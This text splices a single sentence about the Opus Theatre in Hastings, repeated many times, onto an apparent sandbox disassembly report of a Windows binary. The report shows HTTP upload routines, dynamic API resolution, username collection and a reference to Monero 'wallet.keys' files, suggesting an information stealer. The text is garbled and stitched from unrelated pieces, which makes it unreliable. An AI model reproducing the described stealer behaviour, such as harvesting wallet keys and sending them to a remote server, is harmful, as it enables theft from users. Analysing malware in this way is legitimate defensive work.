Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 05a19268384055edfed209a6ef7dbf1e4fac16bdd1d190c2ba487650e4def7d4
                            • Instruction ID: a0aefc66302cf818270491f28ef25d276da5f776e2d532749f23d86a9fdd9839
                            • Opcode Fuzzy Hash: 05a19268384055edfed209a6ef7dbf1e4fac16bdd1d190c2ba487650e4def7d4
                            • Instruction Fuzzy Hash: E6411530FDF604EACE25B7A4A8FEDDD7B5B6F53F04F415088BC2752680CAA26500C696
                            Function 00674880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 674880-674942 call 68a7a0 call 6747b0 call 68a740 * 5 InternetOpenA StrCmpCA 816 674944 801->816 817 67494b-67494f 801->817 816->817 818 674955-674acd call 688b60 call 68a920 call 68a8a0 call 68a800 * 2 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a920 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a920 call 68a8a0 call 68a800 * 2 InternetConnectA 817->818 819 674ecb-674ef3 InternetCloseHandle call 68aad0 call 679ac0 817->819 818->819 905 674ad3-674ad7 818->905 829 674ef5-674f2d call 68a820 call 68a9b0 call 68a8a0 call 68a800 819->829 830 674f32-674fa2 call 688990 * 2 call 68a7a0 call 68a800 * 8 819->830 829->830 906 674ae5 905->906 907 674ad9-674ae3 905->907 908 674aef-674b22 HttpOpenRequestA 906->908 907->908 909 674ebe-674ec5 InternetCloseHandle 908->909 910 674b28-674e28 call 68a9b0 call 68a8a0 call 68a800 call 68a920 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a920 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a920 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a9b0 call 68a8a0 call 68a800 call 68a920 call 68a8a0 call 68a800 call 68a740 call 68a920 * 2 call 68a8a0 call 68a800 * 2 call 68aad0 lstrlen call 68aad0 * 2 lstrlen call 68aad0 HttpSendRequestA 908->910 909->819 1021 674e32-674e5c InternetReadFile 910->1021 1022 674e67-674eb9 InternetCloseHandle call 68a800 1021->1022 1023 674e5e-674e65 1021->1023 1022->909 1023->1022 1024 674e69-674ea7 call 68a9b0 call 68a8a0 call 68a800 1023->1024 1024->1021
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00674915
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 0067493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00674ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00690DDB,00000000,?,?,00000000,?,",00000000,?,012BF4B0), ref: 00674DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00674E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00674E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00674E49
                            • InternetCloseHandle.WININET(00000000), ref: 00674EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00674EC5
                            • HttpOpenRequestA.WININET(00000000,012BF4A0,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00674B15
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • InternetCloseHandle.WININET(00000000), ref: 00674ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: b7dd21d8f9ac918c3f49f4aa893bf2967a70252c829dbbcc5ff1d13c57987c00
                            • Instruction ID: b8ac00ca8e09ae115719ae5b5f50ea4f72599b96d9ac2bd88c8a81cf9471bc91
                            • Opcode Fuzzy Hash: b7dd21d8f9ac918c3f49f4aa893bf2967a70252c829dbbcc5ff1d13c57987c00
                            • Instruction Fuzzy Hash: 6412EC71911118AAEB55FB90DC92FEEB33AAF14300F50429EF50672491EF742F49CB6A
                            Function 00687850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006711B7), ref: 00687880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0068789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 71aa66f29927e053b54f7e2de70abdda607e9f4359d670733cf74fbf16ec8805
                            • Instruction ID: 03152a2bba428dd0d0e8139d05c438067915efbbaf8fb19326dba88343a1d68e
                            • Opcode Fuzzy Hash: 71aa66f29927e053b54f7e2de70abdda607e9f4359d670733cf74fbf16ec8805
                            • Instruction Fuzzy Hash: 41F04FF1944208ABC704DF98DD49FAEBBB8FB04711F10026AFA05A2680C77555048BA1
                            Function 00671160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: c15d7193b14491d3865bc19698ca32ddcb7b1843a629d324139ff7db2b80e39f
                            • Instruction ID: 79502440fc4bf89341e9ed9f13e342ab5c2f110ece3341489340809e2e36844d
                            • Opcode Fuzzy Hash: c15d7193b14491d3865bc19698ca32ddcb7b1843a629d324139ff7db2b80e39f
                            • Instruction Fuzzy Hash: 34D05E7490430CDBCB04DFE0D8496DDBB78FB08321F000695D90562340EA315481CAAA
                            Function 00689C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 689c10-689c1a 634 689c20-68a031 GetProcAddress * 43 633->634 635 68a036-68a0ca LoadLibraryA * 8 633->635 634->635 636 68a0cc-68a141 GetProcAddress * 5 635->636 637 68a146-68a14d 635->637 636->637 638 68a153-68a211 GetProcAddress * 8 637->638 639 68a216-68a21d 637->639 638->639 640 68a298-68a29f 639->640 641 68a21f-68a293 GetProcAddress * 5 639->641 642 68a2a5-68a332 GetProcAddress * 6 640->642 643 68a337-68a33e 640->643 641->640 642->643 644 68a41f-68a426 643->644 645 68a344-68a41a GetProcAddress * 9 643->645 646 68a428-68a49d GetProcAddress * 5 644->646 647 68a4a2-68a4a9 644->647 645->644 646->647 648 68a4ab-68a4d7 GetProcAddress * 2 647->648 649 68a4dc-68a4e3 647->649 648->649 650 68a515-68a51c 649->650 651 68a4e5-68a510 GetProcAddress * 2 649->651 652 68a612-68a619 650->652 653 68a522-68a60d GetProcAddress * 10 650->653 651->650 654 68a61b-68a678 GetProcAddress * 4 652->654 655 68a67d-68a684 652->655 653->652 654->655 656 68a69e-68a6a5 655->656 657 68a686-68a699 GetProcAddress 655->657 658 68a708-68a709 656->658 659 68a6a7-68a703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(77190000,012A5548), ref: 00689C2D
                            • GetProcAddress.KERNEL32(77190000,012A5388), ref: 00689C45
                            • GetProcAddress.KERNEL32(77190000,012B8F90), ref: 00689C5E
                            • GetProcAddress.KERNEL32(77190000,012B8DC8), ref: 00689C76
                            • GetProcAddress.KERNEL32(77190000,012B8FA8), ref: 00689C8E
                            • GetProcAddress.KERNEL32(77190000,012BD320), ref: 00689CA7
                            • GetProcAddress.KERNEL32(77190000,012AA8E8), ref: 00689CBF
                            • GetProcAddress.KERNEL32(77190000,012BD2A8), ref: 00689CD7
                            • GetProcAddress.KERNEL32(77190000,012BD1B8), ref: 00689CF0
                            • GetProcAddress.KERNEL32(77190000,012BD0F8), ref: 00689D08
                            • GetProcAddress.KERNEL32(77190000,012BD050), ref: 00689D20
                            • GetProcAddress.KERNEL32(77190000,012A55A8), ref: 00689D39
                            • GetProcAddress.KERNEL32(77190000,012A54E8), ref: 00689D51
                            • GetProcAddress.KERNEL32(77190000,012A5468), ref: 00689D69
                            • GetProcAddress.KERNEL32(77190000,012A55C8), ref: 00689D82
                            • GetProcAddress.KERNEL32(77190000,012BD1E8), ref: 00689D9A
                            • GetProcAddress.KERNEL32(77190000,012BD110), ref: 00689DB2
                            • GetProcAddress.KERNEL32(77190000,012AA5C8), ref: 00689DCB
                            • GetProcAddress.KERNEL32(77190000,012A5488), ref: 00689DE3
                            • GetProcAddress.KERNEL32(77190000,012BD260), ref: 00689DFB
                            • GetProcAddress.KERNEL32(77190000,012BD170), ref: 00689E14
                            • GetProcAddress.KERNEL32(77190000,012BD1D0), ref: 00689E2C
                            • GetProcAddress.KERNEL32(77190000,012BD128), ref: 00689E44
                            • GetProcAddress.KERNEL32(77190000,012A55E8), ref: 00689E5D
                            • GetProcAddress.KERNEL32(77190000,012BD230), ref: 00689E75
                            • GetProcAddress.KERNEL32(77190000,012BD080), ref: 00689E8D
                            • GetProcAddress.KERNEL32(77190000,012BD098), ref: 00689EA6
                            • GetProcAddress.KERNEL32(77190000,012BD200), ref: 00689EBE
                            • GetProcAddress.KERNEL32(77190000,012BD2F0), ref: 00689ED6
                            • GetProcAddress.KERNEL32(77190000,012BD068), ref: 00689EEF
                            • GetProcAddress.KERNEL32(77190000,012BD218), ref: 00689F07
                            • GetProcAddress.KERNEL32(77190000,012BD2C0), ref: 00689F1F
                            • GetProcAddress.KERNEL32(77190000,012BD188), ref: 00689F38
                            • GetProcAddress.KERNEL32(77190000,012AFE38), ref: 00689F50
                            • GetProcAddress.KERNEL32(77190000,012BD308), ref: 00689F68
                            • GetProcAddress.KERNEL32(77190000,012BD1A0), ref: 00689F81
                            • GetProcAddress.KERNEL32(77190000,012A5628), ref: 00689F99
                            • GetProcAddress.KERNEL32(77190000,012BD038), ref: 00689FB1
                            • GetProcAddress.KERNEL32(77190000,012A54A8), ref: 00689FCA
                            • GetProcAddress.KERNEL32(77190000,012BD248), ref: 00689FE2
                            • GetProcAddress.KERNEL32(77190000,012BD0B0), ref: 00689FFA
                            • GetProcAddress.KERNEL32(77190000,012A5648), ref: 0068A013
                            • GetProcAddress.KERNEL32(77190000,012A5668), ref: 0068A02B
                            • LoadLibraryA.KERNEL32(012BD2D8,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A03D
                            • LoadLibraryA.KERNEL32(012BD278,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A04E
                            • LoadLibraryA.KERNEL32(012BD290,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A060
                            • LoadLibraryA.KERNEL32(012BD0C8,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A072
                            • LoadLibraryA.KERNEL32(012BD0E0,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A083
                            • LoadLibraryA.KERNEL32(012BD140,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A095
                            • LoadLibraryA.KERNEL32(012BD158,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A0A7
                            • LoadLibraryA.KERNEL32(012BD500,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A0B8
                            • GetProcAddress.KERNEL32(77040000,012A50C8), ref: 0068A0DA
                            • GetProcAddress.KERNEL32(77040000,012BD440), ref: 0068A0F2
                            • GetProcAddress.KERNEL32(77040000,012B8A18), ref: 0068A10A
                            • GetProcAddress.KERNEL32(77040000,012BD5A8), ref: 0068A123
                            • GetProcAddress.KERNEL32(77040000,012A5288), ref: 0068A13B
                            • GetProcAddress.KERNEL32(73D20000,012AA988), ref: 0068A160
                            • GetProcAddress.KERNEL32(73D20000,012A4F88), ref: 0068A179
                            • GetProcAddress.KERNEL32(73D20000,012AA6B8), ref: 0068A191
                            • GetProcAddress.KERNEL32(73D20000,012BD620), ref: 0068A1A9
                            • GetProcAddress.KERNEL32(73D20000,012BD3F8), ref: 0068A1C2
                            • GetProcAddress.KERNEL32(73D20000,012A5068), ref: 0068A1DA
                            • GetProcAddress.KERNEL32(73D20000,012A5368), ref: 0068A1F2
                            • GetProcAddress.KERNEL32(73D20000,012BD3E0), ref: 0068A20B
                            • GetProcAddress.KERNEL32(768D0000,012A4FA8), ref: 0068A22C
                            • GetProcAddress.KERNEL32(768D0000,012A5228), ref: 0068A244
                            • GetProcAddress.KERNEL32(768D0000,012BD380), ref: 0068A25D
                            • GetProcAddress.KERNEL32(768D0000,012BD548), ref: 0068A275
                            • GetProcAddress.KERNEL32(768D0000,012A5028), ref: 0068A28D
                            • GetProcAddress.KERNEL32(75790000,012AA6E0), ref: 0068A2B3
                            • GetProcAddress.KERNEL32(75790000,012AA708), ref: 0068A2CB
                            • GetProcAddress.KERNEL32(75790000,012BD530), ref: 0068A2E3
                            • GetProcAddress.KERNEL32(75790000,012A4FC8), ref: 0068A2FC
                            • GetProcAddress.KERNEL32(75790000,012A5328), ref: 0068A314
                            • GetProcAddress.KERNEL32(75790000,012AA910), ref: 0068A32C
                            • GetProcAddress.KERNEL32(75A10000,012BD3C8), ref: 0068A352
                            • GetProcAddress.KERNEL32(75A10000,012A4FE8), ref: 0068A36A
                            • GetProcAddress.KERNEL32(75A10000,012B88D8), ref: 0068A382
                            • GetProcAddress.KERNEL32(75A10000,012BD410), ref: 0068A39B
                            • GetProcAddress.KERNEL32(75A10000,012BD458), ref: 0068A3B3
                            • GetProcAddress.KERNEL32(75A10000,012A5188), ref: 0068A3CB
                            • GetProcAddress.KERNEL32(75A10000,012A5008), ref: 0068A3E4
                            • GetProcAddress.KERNEL32(75A10000,012BD590), ref: 0068A3FC
                            • GetProcAddress.KERNEL32(75A10000,012BD560), ref: 0068A414
                            • GetProcAddress.KERNEL32(76850000,012A52C8), ref: 0068A436
                            • GetProcAddress.KERNEL32(76850000,012BD5C0), ref: 0068A44E
                            • GetProcAddress.KERNEL32(76850000,012BD5D8), ref: 0068A466
                            • GetProcAddress.KERNEL32(76850000,012BD428), ref: 0068A47F
                            • GetProcAddress.KERNEL32(76850000,012BD470), ref: 0068A497
                            • GetProcAddress.KERNEL32(75690000,012A5148), ref: 0068A4B8
                            • GetProcAddress.KERNEL32(75690000,012A5048), ref: 0068A4D1
                            • GetProcAddress.KERNEL32(769C0000,012A50E8), ref: 0068A4F2
                            • GetProcAddress.KERNEL32(769C0000,012BD3B0), ref: 0068A50A
                            • GetProcAddress.KERNEL32(6F8C0000,012A5128), ref: 0068A530
                            • GetProcAddress.KERNEL32(6F8C0000,012A5248), ref: 0068A548
                            • GetProcAddress.KERNEL32(6F8C0000,012A5268), ref: 0068A560
                            • GetProcAddress.KERNEL32(6F8C0000,012BD4D0), ref: 0068A579
                            • GetProcAddress.KERNEL32(6F8C0000,012A52A8), ref: 0068A591
                            • GetProcAddress.KERNEL32(6F8C0000,012A5108), ref: 0068A5A9
                            • GetProcAddress.KERNEL32(6F8C0000,012A52E8), ref: 0068A5C2
                            • GetProcAddress.KERNEL32(6F8C0000,012A5088), ref: 0068A5DA
                            • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0068A5F1
                            • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0068A607
                            • GetProcAddress.KERNEL32(75D90000,012BD578), ref: 0068A629
                            • GetProcAddress.KERNEL32(75D90000,012B8938), ref: 0068A641
                            • GetProcAddress.KERNEL32(75D90000,012BD5F0), ref: 0068A659
                            • GetProcAddress.KERNEL32(75D90000,012BD488), ref: 0068A672
                            • GetProcAddress.KERNEL32(76470000,012A5348), ref: 0068A693
                            • GetProcAddress.KERNEL32(702D0000,012BD608), ref: 0068A6B4
                            • GetProcAddress.KERNEL32(702D0000,012A50A8), ref: 0068A6CD
                            • GetProcAddress.KERNEL32(702D0000,012BD4A0), ref: 0068A6E5
                            • GetProcAddress.KERNEL32(702D0000,012BD4B8), ref: 0068A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: e3a7467977cb6ec20a88b8e34a7920984bf931d36b9692081575630b2f3a4781
                            • Instruction ID: 15743d4f5d31b53ceaebfcece8217a67905de85274a341da0d85ab06d19b4c42
                            • Opcode Fuzzy Hash: e3a7467977cb6ec20a88b8e34a7920984bf931d36b9692081575630b2f3a4781
                            • Instruction Fuzzy Hash: AC624FB5508200AFC35CDFA8FD8896637F9F74C701714872AA699C3674DB3AA841DF1A
                            Function 00676280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 676280-67630b call 68a7a0 call 6747b0 call 68a740 InternetOpenA StrCmpCA 1040 676314-676318 1033->1040 1041 67630d 1033->1041 1042 67631e-676342 InternetConnectA 1040->1042 1043 676509-676525 call 68a7a0 call 68a800 * 2 1040->1043 1041->1040 1045 6764ff-676503 InternetCloseHandle 1042->1045 1046 676348-67634c 1042->1046 1062 676528-67652d 1043->1062 1045->1043 1048 67634e-676358 1046->1048 1049 67635a 1046->1049 1051 676364-676392 HttpOpenRequestA 1048->1051 1049->1051 1053 6764f5-6764f9 InternetCloseHandle 1051->1053 1054 676398-67639c 1051->1054 1053->1045 1056 6763c5-676405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 67639e-6763bf InternetSetOptionA 1054->1057 1059 676407-676427 call 68a740 call 68a800 * 2 1056->1059 1060 67642c-67644b call 688940 1056->1060 1057->1056 1059->1062 1067 67644d-676454 1060->1067 1068 6764c9-6764e9 call 68a740 call 68a800 * 2 1060->1068 1071 6764c7-6764ef InternetCloseHandle 1067->1071 1072 676456-676480 InternetReadFile 1067->1072 1068->1062 1071->1053 1076 676482-676489 1072->1076 1077 67648b 1072->1077 1076->1077 1080 67648d-6764c5 call 68a9b0 call 68a8a0 call 68a800 1076->1080 1077->1071 1080->1072
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • InternetOpenA.WININET(00690DFE,00000001,00000000,00000000,00000000), ref: 006762E1
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00676335
                            • HttpOpenRequestA.WININET(00000000,GET,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00676385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006763BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006763D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006763FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0067646D
